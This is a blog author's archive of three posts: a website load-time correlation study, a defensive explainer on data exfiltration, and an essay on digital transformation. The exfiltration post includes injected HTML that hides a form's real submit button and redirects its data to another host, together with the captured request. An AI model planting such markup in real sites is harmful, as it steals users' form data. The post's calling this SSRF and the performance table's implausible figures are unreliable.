Author Archives: @ndreah

Nowadays the speed of Internet is much better than in the past, but we can still see websites with high loading time.

Low-performing websites produce several negative side effects, for example:

  • "Research has shown that when loading time increases from one to three seconds, a user is 32% more likely to bounce. If the loading time is longer than five seconds, the probability of bouncing increases by 90%. Such experiences can prove rather frustrating, which means that large numbers of users will choose not to return to this page";
  • 46% of users don't revisit poorly performing websites;
  • low reputation of the website and negative impacts to the business. Ecommerce sites will pratically pay the price for delays;
  • bad advertisement for the service, firm or business the website represents.

For this reasons we are going to analyse what affects the performance and usability of a website.

FIRST STUDY: HOME PAGE OF MOST POPULAR ITALIAN NEWS WEBSITE

We have chosen, as small representative sample for the study, the homepage of most well-known Italian newspapers because we think they are accessed every day from lots of users so their performance should be very crucial.

These homepages have been studied using GMetrix [02]: a website performance analytics tool that provides professional reports.

Taking a significant subset of data produced by GMetrix we have the following table:

By calculating the Pearson’s correlation coefficient between the Fully Loaded Time and respectively the Total Page Size, the Total Image Size and the Total of HTTP Requests, we have the results shown in the following table.

The use of Pearson Correlation Coefficient (PCC) reveals: a small correlation between Fully Loaded Time and Total Page Size, a moderate correlation between Fully Loaded Time and Total Image Size and a Strong correlation between Fully Loaded Time and Total of HTTP Requests.

SECOND STUDY: HOME PAGE OF MOST POPULAR WEB SEARCH ENGINE

Website
----------------------***
Fully Loaded Time secTotal Page Size KBTotal IMG Size KB% IMG SizeTotal of Requests
www.gigablast.com0.39933.9030.8080.005
www.lukol.com0.61660.3030.2042.907
www.oscobo.com2.000243.0057.307.1014
search.disconnect.me1.600442.00186.0031.2016
yandex.com3.500819.00333.0018.8016
www.google.com0.613521.006.821.3022
infinitysearch.co0.763179.0087.2034.8023
duckduckgo.com0.438350.0012.4020.0025
www.startpage.com1.000397.0057.7014.3028
search.yahoo.com989.000250,880.00180224.0058.6029
metager.org1.800257.0084.6066.7030
www.wolframalpha.com14.000709.0033.506.2032
swisscows.com6.100932,864.00742400.0060.0045
www.baidu.com4.500810.00160.0038.5052
searchencrypt.com6.000464.0031.601.9054
www.gibiru.com0.809316,416.00273408.0042.6054
www.qwant.com3.800126,976.00289.0019.5087
boardreader.com6.000222,208.009.9025.60121
www.bing.com3.200277,504.00115688.0050.00222
www.ask.com12.700326,656.00144384.0030.70982

Two VariablesCalculated Pearson
correlation coefficient [03]
Value RangeStrength of Association
Fully Loaded Time and
Total Page Size
0.13779770.1 .. 0.29Small
Fully Loaded Time and
Total Image Size
0.37096920.3.. 0.49Moderate
Fully Loaded Time and
Total of HTTP Requests
0.57878090.5 .. 1.0Strong

RESULT OF INVESTIGATION

The strong correlation (about 0.8 in the first study and about 0.6 in the second study) between the loading time and the total of HTTP requests means that the number of HTTP requests generally have a direct impact on how quickly the web page loads.

Website speed is a key factor in SEO. It affects search engine ranking factor determining search engine placement which is connected to Google’s algorithms.

One way to speed up a website is to reduce the number of HTTP requests. Here are some tips:

  • Using CDN (Content Delivery Network);
  • Delete unnecessary images;
  • Reduce image size;
  • Implement the lazy loading technique;
  • Minifying CSS and JavaScript files.

REFERENCES

[01] Tai Wen Jun, Low Zi Xiang, Nor Azman Ismail. William Goy Ren Yi, Usability Evaluation of Social Media Website, International Research Journal of Modernization in Engineering Technology and Science, January 2021;

[02] https://gtmetrix.com, GMetrix: How fast does your website load?;

[03] https://www.webpagetest.org/: Instantly test your site’s performance in real browsers, devices, and locations around the world;

[04] https://en.wikipedia.org/wiki/Pearson_correlation_coefficient Pearson correlation coefficient;

[05] https://en.wikipedia.org/wiki/Same-origin_policy Same-origin policy;

[06] https://neilpatel.com/blog/does-speed-impact-rankings/: We Analyzed 143,827 URLs and Discovered the Overlooked Speed Factors That Impact Google Rankings;

Last update on 30/03/2022

 

Data exfiltration is the unauthorized transfer of sensitive information from a target’s network to a location which a threat actor controls”[02].   For the National Security and Organizations the worst scenario is when the attackers not only steal data (cyber-espionage) but also modify them producing cyber-sabotage.

The leakage of sensitive information from a protected network to an external network could result in serious damage to the organizations in terms of reputation, loss of revenue and legal consequences, for example:

  • National Security: the steal of classified documents may endanger national security;
  • Organizations: proprietary information can be sold to a rival company causing a loss of competitive advantage;
  • Citizens: the spreading of personal sensitive data could have serious privacy and security implications like Identity Theft by an ATO attack.

Sensitive proprietary digital information could be contained in:

  • static content: files, images, texts, spreadsheets, phone-books, agenda etc.;
  • dynamic content: multimedia sessions, telephone conversations, video conferences, chatting channels (text, video image).

The leakage can be done in several ways:

- the data are ex-filtrated without altering the original files;
- the data are modified: converted in new file format or encrypted;
- the data are hidden using steganography techniques;
- the data are ex-filtrated using a combination of the aforementioned techniques.

 

OUTSIDER ATTACK: CYBER-ESPIONAGE AND CYBER-SABOTAGE BY SSRF

SSRF ( Server-Side Request Forgery) is  an external attack which lets an attacker send crafted requests from the back-end server of a vulnerable web application. SSRF is commonly used by attackers to target internal networks that are behind firewalls and can not be reached from the external network.

 

This image has an empty alt attribute; its file name is SSRF.png

 

SSRF - Server Side Request Forgery Schema

 

It is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. Furthermore it could:

✔ potentially leaking sensitive data such as authorization credentials;
✔ might even allow an attacker to perform arbitrary command execution.

 

AN SSRF ATTACK: ABUSED HTML FORM ATTACK MECHANISM

An attacker can export users’ sensitive data using “HTML form injection attack”. Here is an example of using the formaction attribute. According to the HTML 5 specification, it can be used to overwrite the action attribute of its parent form by specifying the URL of the file that will process the input control when the from is submitted.

Le us consider the following normal form in a HTML page:

<form action=”URL” ... >

list of couples (label, data-box)

<button type=”submit”... /> label </button>

</form>

We inject a formaction attribute:

<form action=”URL” ... >

list of couples (label, data-box)

<button type="submit" formaction="BAD URL "> Fake Search! </button>

</form>

The injected form sends its form-data to BAD URL instead of URL.

 

HTML FORM ATTACK EXAMPLE

In this type of attack we use the formaction attribute which is fully supported by all browsers. It specifies where to send the form-data when a form is submitted by overriding the form's  action attribute. The following HTML code:

<h1>AUTHENTICATION System</h1> 

<div align="left">

<form action="/action.php" method="get">

<label for="nPSW">My Password:</label>
<input type="text" id="iPSW" name="nPSW"><br><br>

<button type="submit">Submit Password</button>

<button type="submit" formaction="/form_action.php">Submit Password to another page</button>

</form>
</div>

produces:

This image has an empty alt attribute; its file name is formaction.png

 

by clicking on Submit Password we have:

action.php?nPSW=BadPSW123456

by clicking on Submit Password to another page we have:

form_action.php?nPSW=BadPSW123456

The following HTML:

<article>

<form name="fsbycode" class="s4form" action="http://www.spunctum.it" method="post">

<header>
<h2>Search Guest By Numeric Code</h2>
</header>

Codice Numerico: <input type="number" autocomplete="on" id="icode" name="icode" autofocus placeholder="Insert Code Number" >

<input class="SButton" type="submit" value="Search!">

</form>

</article>

Produce this form in the web browser:

 

Normal Web Form

The attack on the web server can produce the following  abused HTML:


<article>
<form name="fsbycode" class="s4form" action="http://www.spunctum.it" method="post">

<header>
<h2>Search Guest By Numeric Code</h2>
</header>

Codice Numerico: <input type="number" autocomplete="on" id="icode" name="icode"
autofocus placeholder="Insert Code Number" >

<!-- BEGIN attacker's code -->
      <button type="submit" formaction="http://www.volucer.it"> Fake Search! </button>
      <style> .SButton {visibility:hidden;} </style>
<!-- END attacker's code -->

<input class="SButton" type="submit" value="Search!">

</form>
</article>

As we can see in the above code, the correct button used for the submission of the form is hidden by using the style applied to the class .SButton <style> .SButton {visibility:hidden;} </style>.

The previous HTML shows in the browser:

Abused Web Form
By clicking on Fake Search! button the next HTTP request is produced:

POST http://www.volucer.it/ HTTP/1.1
Host: www.volucer.it
Proxy-Connection: keep-alive
Content-Length: 16
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: null
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip,deflate,sdch
Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4,he;q=0.2

icode=0123456789

This show how the data are sent to the illegitimate web site "www.volucer.it" instead of www.spunctum.it (the web site are only used for demonstration purposes of how the attack scheme works).

 

INSIDER ATTACK: CYBER-ESPIONAGE AND CYBER-SABOTAGE

It is done by a trusted individual with legitimate access to its network and system resources.  Compared to external threats, insider threats are more dangerous and difficult to detect and prevent.  

if the insider individual uses the protected network to exfiltrate sensitive information, he could use several type of communication channel:

  • overt communication: preserving privacy by using encryption;
  • tunnelled communication: over authorized overt channel;
  • covert communication: using steganography techniques to cloak the content.

 

 

ABOUT MITIGATION

In order to face this serious problem the security system of a ICT infrastructure must be equipped with mechanisms for prevention, detection, damage limitation and monitoring.

PREVENTION
In order to lower the risk of attacks, unauthorized communication channels should be blocked to prevent the exfiltration of data externally to the organization through compromised applications.

DETECTION
We need a system to detect when a web site is compromised to promptly react to the attack.
The use of Sensitive Information Dissemination Detection (SIDD) systems is a mechanism for stopping leakage of sensitive information on time. It monitors the outbound traffic from the protected network, taking actions responsively in case of suspect traffic of packets.

DAMAGE LIMITATION AND RECOVERY
When the attack is in progress we have to limit the damages by closing any compromised channels.
After attack detection this is what must be done in order to minimize information leakage:

1) analyze what vulnerability has been exploited and if it is structural of the system or not;
2) harden the security of the information system to avoid another attack of the same type.

MONITORING
If the security system doesn't detect any problems, it is highly recommended to run a random deep security check because an information leakage could have been happened in a stealthy mode.

 

REFERENCES

  1. Eric Y. Chen, Sergey Gorbaty, Astha Singhal and Collin Jackson: Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control, Carnegie Mellon University;
  2. http://blog.trendmicro.com/trendlabs-security-intelligence/data-exfiltration-in-targeted-attacks/;
  3. Yali Liu, Cherita Corbett and Ken Chiang, Rennie Archibald, Biswanath Mukherjee and Dipak Ghosal, SIDD: A Framework for Detecting Sensitive Data Exfiltration by Insider Attack, University of California, Usa;
  4. https://vladtoie.gitbook.io/secure-coding/server-side/server-side-request-forgery-ssrf: Server-Side Request Forgery (SSRF);

Last update on 19/03/2022

Digital transformation (DT) is the process of integration of digital technology into all areas of a business to create new — or modify existing — business processes and customer experiences to meet changing business and market requirements. It's also a cultural change that requires organizations to continually challenge the status quo, experiment, and get comfortable with failure. It is important not to confuse Digital Transformation with investing in technology or digitalizing paper archives.

The revolution of Digital Transformation involves every aspect of modern society both public and private sectors.

It is essential to governments, as they have to keep up with the rapid changes through more efficient delivery of services and for the creation of the so-called “digital cities”. It is really urgent for industry, service companies, and so on as if they don’t transform themselves they have a high risk of extinction in a high competitive digitized economy.

While in the public sector the government should initiate and propel Digital Transformation, in the private sector instead this is up to CEO, who should be ready to explain to the board the power of digital technology applied to every aspect of the organization, especially in term of increasing in revenue.

Digital Transformation is a key factor of success to bring a traditional company to competitive company in a digitized economy.

CEO could adopt the follow approach:

  1. Leverage insiders. They have an intimate knowledge about what works and what doesn’t in their daily activity.
  2. Analyse customer experience from the outside. The goal of digital transformation is to improve customer satisfaction.
  3. Involve employees. They are an important key for the success of Digital Transformation. For this reason they mustn’t feel the fear of being replaced. On the contrary need to emphasize them that Digital Transformation is an opportunity to upgrade their expertise to suit the marketplace of the future.
  4. Analyse the present model of business, in particular realize which is the “core business” and what isn’t and therefore can be externalized.
  5. Define the concrete goals of the transformation: speed, innovation, high level of customer care but only in the direction of consolidating and increasing the core business.
  1. Elaborate a new model of business with the new technology (Cloud computing, Big Data, IoT, AI) and concrete goals in mind and using as reference the present one.
  2. decide which digital tools one should adopt
  3. elaborate a plan for employee training
  4. Implement the Digital Transformation based on new in theory working model of business step-by-step. It works better than all-or-nothing approach because after every step you can check and verify if you going to go in the right direction.

CYBERSECURITY IS A TOP PRIORITY

During the process of Digital Transformation a company must be protected by cyberattack which can stop the process or the company must fail by losing reputation with an impact on its core business. Cybersecurity must grow in parallel with the increasing digitalization of work processes. So to keep safe the constant Digital Transformation it is necessary to boost cybersecurity by integrating AI and ML technologies into security solutions and add regulations for data privacy and protection.

Cyber-attacks, espionage, sabotage and data theft are the major risk to business activities, so security and trust are essential for a successful digital transformation.

The Digital Transformation increases the attack surface because:

  • every company is becoming a data company;
  • employees have ubiquitous access to applications and data for more productivity;
  • customers use digital interaction.

So investing in cybersecurity means:

  • protecting data that are important for strategic advantage;
  • increasing and defending the reputation of the company;
  • avoiding money loss and the extinction of the company.

Cybersecurity minimizes the risk of a fail in the Digital Transformation and this is a must for the survival of transformed company.

References

[01] Thomas M. Siebel “Digital Transformation – Survive and Thrive in an Era of Mass Extinction”, RosettaBooks, New York 2019;

[02] Behnam Tabrizi, Ed Lam, Kirk Girard, and Vernon Irvin, “Digital Transformation is not about technology”, Harvard Business Review, 2021